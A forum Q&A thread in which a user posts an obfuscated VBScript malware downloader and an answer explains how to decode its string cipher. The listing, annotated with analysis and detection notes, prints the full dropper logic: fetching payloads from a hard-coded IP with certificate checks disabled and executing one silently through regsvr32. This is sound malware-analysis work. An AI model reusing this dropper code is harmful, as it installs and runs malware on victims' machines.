Virus decryption - vbscript


Option Explicit
' Analyst notes: this is an obfuscated VBScript downloader. Every literal below
' is wrapped as  uckp9923(fdhtrhou8434("..."))  — fdhtrhou8434 strips "@" signs
' and uckp9923 reverses the string and subtracts the character codes of the key
' kwjktixh825 ("ijn34g"), cycling through the key. The plaintext noted next to
' each line was obtained by applying that routine by hand. Several literals lost
' a byte when they were pasted (cp1252 has no glyph for 0x81/0x8D/0x8F/0x90/
' 0x9D), so a few decode one character short; re-derive them from the raw
' sample bytes before using them as indicators.
On Error Resume Next
' ^ every runtime error from here on is silently swallowed (including the
'   Option Explicit violation on the last line of this section), so the script
'   never surfaces a failure.
dim rbs309
dim tadjakmnmfrg4460
dim icsnvk206
dim wsmp1276
dim falkal1610
dim rfqgobyeyrp5319
dim gtxhgi5556
dim mll8810
dim qxat8709
dim hgurgqrv3280
dim baknqdo6857
dim cioslu3564
dim sndohhjq1214
dim lwwfaim8338
dim haprm493
dim iltkfxbb2382
dim dhydlcp7543
dim qpdu6740
dim gtlbowwr6975
dim xcyi8081
dim isfotb6795
dim uguojbssq5199
dim dycbyrmy5608
dim suqmi6111
dim mojspk6072
dim gwjdvxqxpi1867
dim syc9022
dim cwnilskntu6156
dim jycej9917
dim kaumen4761
dim hpml9179
dim stwjmww5737
dim mju2625
dim idmndh94
dim lkrm5932
dim kfdvhjl9992
dim fyv2635
dim njuv4832
dim ygvhoo991
dim twfygbvnne8124
dim kwjktixh825

kwjktixh825         = "ijn34g"   ' the decode key; must be assigned before any uckp9923 call
rbs309              = uckp9923(fdhtrhou8434("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ"))   ' base URL "http://<bare IPv4 address>/<path>" (one byte lost in paste); payload suffixes are appended to it below
tadjakmnmfrg4460    = uckp9923(fdhtrhou8434(""))   ' empty string: trailing argument of the regsvr32 command line on the last line of the script
icsnvk206           = uckp9923(fdhtrhou8434("šÝ›—•ÖÕ"))   ' "load-s1": text written to the run-once marker file
wsmp1276            = uckp9923(fdhtrhou8434("ÔÜݪ¨Ì·˜â£Ù̽Å"))   ' "WScript.Network" (one byte lost in paste) — used only to read ComputerName
falkal1610          = uckp9923(fdhtrhou8434("ÕÖÓ›‡•ÝÚ×¥—ºÀ"))   ' "WScript.Shell" — its .run launches the payload
rfqgobyeyrp5319     = uckp9923(fdhtrhou8434("Õ×â›b—"))   ' "0.html" — not referenced anywhere in this listing
gtxhgi5556          = uckp9923(fdhtrhou8434("ÐÚØa—"))   ' "c.jpg" — not referenced in this listing
mll8810             = uckp9923(fdhtrhou8434("¹º¯X"))   ' "%APP" — unreferenced fragment
qxat8709            = uckp9923(fdhtrhou8434("Ž«Âtx"))   ' "DATA%" — unreferenced fragment (with the previous line, looks like a leftover "%APPDATA%")
hgurgqrv3280        = uckp9923(fdhtrhou8434("ÏÓÕa¬"))   ' "x.gif" — extension given to the dropped payload (see suqmi6111)
baknqdo6857         = uckp9923(fdhtrhou8434("ÖËÓ¥¨º—¬²‚x¨"))   ' "ADODB.Stream" — binary file writer used by SaveBinaryData
cioslu3564          = uckp9923(fdhtrhou8434("ÝÍÓ–¶ÖÏ⦭ºÎÖ×ybÎ×Óâ£Ù̽"))   ' "Scripting.FileSystemObject"
sndohhjq1214        = uckp9923(fdhtrhou8434("‰ÝS™ßΘ f¦ÝÜÑÓ¥"))   ' "regsvr32.exe /s " (one byte lost in paste) — the launcher command; /s = silent
lwwfaim8338         = uckp9923(fdhtrhou8434("ÍÓ"))   ' "id" — name of the marker file inside the drop folder
haprm493            = uckp9923(fdhtrhou8434("Õ×â›bÊ"))   ' "c.html" — URL suffix of the payload that gets executed
iltkfxbb2382        = uckp9923(fdhtrhou8434("Õ×â›b"))   ' ".html" — URL suffix shared by the three other downloads
dhydlcp7543         = uckp9923(fdhtrhou8434("š˜£a¨ÚÎßߘ†×ÝÞ¶¡¾—Úâ§|ÕÒÁ"))   ' "WinHttp.WinHttpRequest.5.1" (one byte lost in paste) — HTTP client used by BinaryGetURL
qpdu6740            = uckp9923(fdhtrhou8434("™˜Ÿb¦ÌÝÞÓš“àÛËÜœ–"))   ' "binary_getter/1.0" — User-Agent sent with every request (a handy network indicator)
kfdvhjl9992         = uckp9923(fdhtrhou8434("ÅÍן–ܹÆᥙھƨv"))   ' "C:\Users\Public\" — preferred drop directory
fyv2635             = uckp9923(fdhtrhou8434("ÅÝà˜§¼‰ÖÚtÚÐØק¨Ì¼ŠÒ¡•‡ÜÞܘ¡ÜÌÙ²nª"))   ' "C:\Documents and Settings\All Users\" (two bytes lost in paste) — Windows XP fallback drop directory
njuv4832            = uckp9923(fdhtrhou8434("Åâ"))   ' "x\" — appended to the first 3 characters of the computer name to form the drop folder
twfygbvnne8124      =  1046   ' compared with Win32_OperatingSystem.OSLanguage below; 1046 (0x0416) is the Windows LCID for Portuguese (Brazil), so the download stage only runs on pt-BR systems
buoyc2863           = uckp9923(fdhtrhou8434("½½½ƒ"))   ' "POST" — never declared with Dim (an Option Explicit error hidden by On Error Resume Next) and never used: BinaryGetURL compares strMethod with the literal string "buoyc2863", not with this variable


Function fdhtrhou8434(Str)
    ' Removes every "@" from Str and returns the result. The obfuscator can
    ' sprinkle "@" into encoded literals so they do not look like contiguous
    ' ciphertext; none of the literals in this listing contain one, so here the
    ' call is a pass-through. Str is modified in place as well (VBScript passes
    ' arguments ByRef by default), exactly as in the original.
    Str = Replace(Str, "@", "")
    fdhtrhou8434 = Str
End Function

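Function uckp9923(Str)
    ' Decodes one obfuscated literal; this is the routine to reproduce when
    ' analysing the sample. Scheme (derived from the code itself): with key =
    ' kwjktixh825 (a script-level global, "ijn34g"), the k-th character of the
    ' result, counted from the END, is Chr(Asc(literal[k]) - Asc(key[((k-1) mod
    ' Len(key)) + 1])). The two StrReverse calls cancel out index-wise: the loop
    ' walks the reversed input from its last position, i.e. the original literal
    ' from its first character, so the key is applied in literal order and the
    ' accumulated string is reversed once at the end.
    '
    ' Fix versus the pasted sample: the multi-line "If ... Then" that resets the
    ' key index had no matching "End If", so the listing could not even be
    ' compiled by the VBScript engine. It is closed here; nothing else changes.
    '
    ' NOTE(review): Chr() of a negative value raises an error. That happens when
    ' a byte of the literal was lost (the paste dropped several cp1252-undefined
    ' bytes); in the original script On Error Resume Next would hide it and the
    ' decoded string would silently come out one character short.
    Dim keyLen, keyPos, pos, cipherByte, keyByte, plain
    plain  = ""
    keyLen = Len(kwjktixh825)
    keyPos = 1
    Str    = StrReverse(Str)
    For pos = Len(Str) To 1 Step -1
        cipherByte = Asc(Mid(Str, pos, 1))
        keyByte    = Asc(Mid(kwjktixh825, keyPos, 1))
        plain      = plain & Chr(cipherByte - keyByte)
        ' Cycle through the key one character per input character.
        keyPos = keyPos + 1
        If keyPos > keyLen Then
            keyPos = 1
        End If
    Next
    uckp9923 = StrReverse(plain)
End Function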


' Double-quote character, used to wrap the payload path on the command line.
gtlbowwr6975    = chr(34)
' WScript.Network (wsmp1276), needed only for ComputerName.
set xcyi8081    = CreateObject(wsmp1276)
' WScript.Shell (falkal1610): its .run method launches the payload at the end.
Set isfotb6795  = WScript.CreateObject(falkal1610)
' Host name; its first two or three characters are reused as folder and file
' names below, so the artefacts are named differently on every machine.
dycbyrmy5608    =  xcyi8081.ComputerName
' Scripting.FileSystemObject (cioslu3564).
Set mojspk6072  = CreateObject(cioslu3564)

' Pick the drop directory: C:\Users\Public\ when it exists (Vista and later),
' otherwise the XP-era C:\Documents and Settings\All Users\. The drop folder
' becomes <that directory><first 3 chars of computer name>x\ .
if mojspk6072.FolderExists(kfdvhjl9992) then 
    uguojbssq5199 = kfdvhjl9992  &  Left(dycbyrmy5608, 3)   &   njuv4832
else
    uguojbssq5199 = fyv2635  &  Left(dycbyrmy5608, 3)  &  njuv4832
end if

' Full path of the file that gets executed: <drop folder><ABC>x.gif. The ".gif"
' extension is cosmetic — the file is later handed to regsvr32.exe, which loads
' it as a DLL regardless of its name.
suqmi6111       = uguojbssq5199   &  Left(dycbyrmy5608, 3)  &  hgurgqrv3280

' Fetches strURL with WinHTTP and returns the raw response body (a byte array)
' when the server answers 200; otherwise the function returns Empty and the
' callers' Do...Loop retries. All TLS certificate errors are ignored and a
' fixed, unusual User-Agent is sent — both are good hooks for a detection rule.
Function BinaryGetURL(strURL)
  Dim objWinHttp
  Dim lngTimeout
  Dim strMethod
  Dim strPostData
  Dim strUserAgentString
  Dim intSslErrorIgnoreFlags
  Dim blnEnableRedirects
  Dim blnEnableHttpsToHttpRedirects

  lngTimeout                    = 59000   ' 59 s each for resolve / connect / send / receive
  strMethod                     = "GET"
  strPostData                   = ""
  intSslErrorIgnoreFlags        = 13056   ' 0x3300 = unknown CA | wrong cert usage | CN mismatch | cert date invalid — i.e. no certificate validation at all
  blnEnableRedirects            = True
  blnEnableHttpsToHttpRedirects = True    ' even an HTTPS -> plain-HTTP downgrade redirect is followed
  Set objWinHttp                = CreateObject(dhydlcp7543)   ' WinHttp.WinHttpRequest.5.1
  objWinHttp.SetTimeouts lngTimeout, lngTimeout, lngTimeout, lngTimeout
  objWinHttp.Option(0)          = qpdu6740                      ' WinHttpRequestOption_UserAgentString = "binary_getter/1.0"
  objWinHttp.Option(4)          = intSslErrorIgnoreFlags        ' WinHttpRequestOption_SslErrorIgnoreFlags
  objWinHttp.Option(6)          = blnEnableRedirects            ' WinHttpRequestOption_EnableRedirects
  objWinHttp.Option(12)         = blnEnableHttpsToHttpRedirects ' WinHttpRequestOption_EnableHttpsToHttpRedirects
  objWinHttp.Open strMethod, strURL, False   ' synchronous request
  ' Dead code: strMethod ("GET") is compared with the literal string "buoyc2863",
  ' not with the variable of that name, so this branch never runs. Note also
  ' that the "_" continuation on the next line is followed by more text on the
  ' same line, which is a syntax error in VBScript — as pasted, the engine would
  ' refuse the whole script; presumably a copy/paste artefact of the post.
  If strMethod = "buoyc2863" Then
    objWinHttp.setRequestHeader "Content-type", _ "application/x-www-form-urlencoded"
  End If

  objWinHttp.Send  strPostData 
  ' Any status other than 200 leaves the return value Empty; SaveBinaryData
  ' then writes nothing and the caller keeps retrying.
  If (objWinHttp.Status = 200) Then
    BinaryGetURL = objWinHttp.ResponseBody
  End If
  Set objWinHttp = Nothing
End Function

' Writes arrByteArray to the file strFN through an ADODB.Stream, but only when
' the argument really is an array (VarType >= vbArray = 8192), i.e. the byte
' array of a successful BinaryGetURL. Empty (a failed download) is skipped
' silently, which is what makes the callers' "Loop Until FileExists" work.
Function SaveBinaryData(arrByteArray, strFN)
dim ryu9878, vocehkn515
ryu9878 = strFN
vocehkn515 = 2   ' adSaveCreateOverWrite: an existing file is replaced
  If VarType(arrByteArray) >= 8192 Then
    Dim objBS
    Set objBS = CreateObject(baknqdo6857)   ' ADODB.Stream
    with objBS
        .Type = 1    ' adTypeBinary
        .Open()
        .Write(arrByteArray)
        .SaveToFile ryu9878 , vocehkn515
    End With
    ' NOTE(review): the stream is never .Close()d; it is only released when
    ' objBS goes out of scope at the end of the function.

  End If 
End Function 
 ' WMI connection; the literal decodes to
 ' "winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2" (two bytes lost in paste).
 Set stwjmww5737 = GetObject(uckp9923(fdhtrhou8434("›àÛœ—ÃÝÙÝ¥•ÅÆ°™ÛÊØݦ¦ÌÙ××p ÌßϺ¡£ÐÝËÜ¢§ÙÎÚÛœ¯¡ÜÞÛš¡ÕÒá")))
 ' Query decodes to "Select * from Win32_OperatingSystem".
 Set mju2625 = stwjmww5737.ExecQuery(uckp9923(fdhtrhou8434("ÖÏ⦭ºÐØק•ÙÎÚ½’fš×ÓÅS¡ÖÛÐŽ]TÛÌÏÚ˜‡")))
 For Each idmndh94 in mju2625
lkrm5932 = idmndh94.OSlanguage   ' LCID of the victim's OS language
 Next
' Created unconditionally; the error raised when the folder already exists is
' hidden by On Error Resume Next.
mojspk6072.CreateFolder(uguojbssq5199)
' Gate: continue only when (a) the marker file <drop folder>id does not exist
' yet (run-once) and (b) the OS language is 1046 = Portuguese (Brazil). On any
' other locale the script ends here without touching the network, so a sandbox
' that is not pt-BR observes nothing.
If (mojspk6072.FileExists(uguojbssq5199 & lwwfaim8338) = false and twfygbvnne8124 = lkrm5932) Then
' Write the marker: OpenTextFile(path, 8 = ForAppending, create = true,
' ASCII) and append the line "load-s1".
Set gwjdvxqxpi1867 = mojspk6072.OpenTextFile(uguojbssq5199 & lwwfaim8338,8,true,false)
gwjdvxqxpi1867.WriteLine icsnvk206
gwjdvxqxpi1867.Close
' Four downloads, each retried until its output file exists. BinaryGetURL
' returns Empty on any non-200 answer and SaveBinaryData then writes nothing,
' so an unreachable server turns each loop into a busy loop with no backoff.
' Below, <AB> = first 2 characters of the computer name, <ABC> = first 3.
'   base URL & ".html"   -> <drop folder><AB>k
Do
SaveBinaryData BinaryGetURL(rbs309 & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "k"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "k") = true
'   base URL & "o.html"  -> <drop folder><AB>o
Do
SaveBinaryData BinaryGetURL(rbs309 & "o" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "o"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "o") = true
'   base URL & "e.html"  -> <drop folder><AB>e
Do
SaveBinaryData BinaryGetURL(rbs309 & "e" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "e"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "e") = true
'   base URL & "c.html"  -> <drop folder><ABC>x.gif (suqmi6111), the file that is executed
Do
SaveBinaryData BinaryGetURL(rbs309 & haprm493), suqmi6111
Loop Until mojspk6072.FileExists(suqmi6111) = true
' Execution: regsvr32.exe /s "<drop folder><ABC>x.gif" <empty string>.
' regsvr32 loads the file as a DLL and calls its DllRegisterServer export, so
' the payload runs under a signed Microsoft binary despite the .gif name.
' Detection: wscript.exe spawning regsvr32.exe with a ".gif" argument under
' C:\Users\Public\ (or All Users) is highly specific to this sample.
isfotb6795.run sndohhjq1214 & gtlbowwr6975 & suqmi6111 & gtlbowwr6975 &  " " & tadjakmnmfrg4460
End If

I received a virus written in VBScript and would like to learn how to decode (deobfuscate) it. What steps or subjects should I study or research to be able to do this? And if there is a website or program that does it, I would appreciate a pointer.


    These things usually aren't encrypted, just lightly scrambled. The function that untangles them is normally right next to the code (otherwise the script could not even run). Is the full code much longer than this?

  • @Bacco, I edited the question; the full code is there now.

  • I sketched out an answer, at least to give you a starting point. If I have some time left I may add more steps later. I think it already gives a good idea of how to "unlock" the code.

1 answer



It's basically a substitution game. I don't intend to walk through the whole function, otherwise the answer would become enormous (I may change my mind later), but the main steps below should give you the idea:

You have known parts, just swap them out until the code is readable.

For example, the function fdhtrhou8434 simply removes every "@" from its argument, so on any line whose string contains no "@" the call can be dropped entirely. For example

rbs309 = uckp9923(fdhtrhou8434("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ"))

is the same as

rbs309 = uckp9923("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ")

Function uckp9923 reverses the string, walks it character by character subtracting the character codes of the key "ijn34g" (held in kwjktixh825, cycling back to its first character after every six), and reverses the result again:

  umr8295   = asc(Mid(str,ogngfnwbr3141,1))
  iael1408  = Asc(Mid(kwjktixh825,mpbx3317,1))
  rbtac94   = rbtac94  &  chr(umr8295 - iael1408)

Apply this to the scrambled strings and you get a series of readable strings. Do it with a pencil, with a small script of your own, or with the decoder function copied into an isolated VM — never by running the sample itself: On Error Resume Next hides every failure, and the tail of the script downloads and executes its payload.

Once decoded, the strings reveal where Function BinaryGetURL(strURL) downloads its payload from (code that may well be malware) and the path where SaveBinaryData writes it to your hard drive; the last lines of the script then launch that file.

The code is merely obfuscated: the only goal is to make you work for it and to hide the intent on a first read — a typical script-kiddie technique.

Just see how much more readable the code becomes by renaming only a few variables, which any code editor's search-and-replace can do:

' Same decoder as in the sample with the local names translated (resultado =
' result, chave = key, tamanhoChave = key length, tamanhoEntrada = input
' length, letraEntrada / letraChave = current input / key character, um = one).
' "chave" stands for the sample's global kwjktixh825 (= "ijn34g"); it is not
' declared in this excerpt.
Function uckp9923(Str)
 resultado      = "" 
 tamanhoChave   = Len( chave )
 iChave         = 1
 tamanhoEntrada = Len(Str) 
 ' The input is reversed here and the result reversed again at the end, so the
 ' loop effectively walks the original literal from its first character.
 str            = StrReverse(Str) 

 For i = tamanhoEntrada To 1 Step -1
    letraEntrada = Asc( Mid( Str, i, 1 ) )
    letraChave   = Asc( Mid( chave, iChave, 1))
    ' One output character = input code minus the current key code.
    resultado    = resultado&  chr(letraEntrada - letraChave)
    um = 1
    iChave = iChave + um
    um = 1

    ' Wrap the key index once the key is exhausted. Carried over from the
    ' sample as pasted: this multi-line If has no "End If", which the VBScript
    ' engine rejects — either close it or write it on a single line.
    If iChave > tamanhoChave Then 
      iChave = um
    Next
    resultado = StrReverse(resultado)
    uckp9923  = resultado
End Function

It’s exactly the same function, I just changed the name of the variables to make it easier to read.

  • Thank you very much for your reply. You have given me a good idea. I appreciate your help. I will study this code better. And if you can describe your steps better until you get this result I thank you even more. Hug!
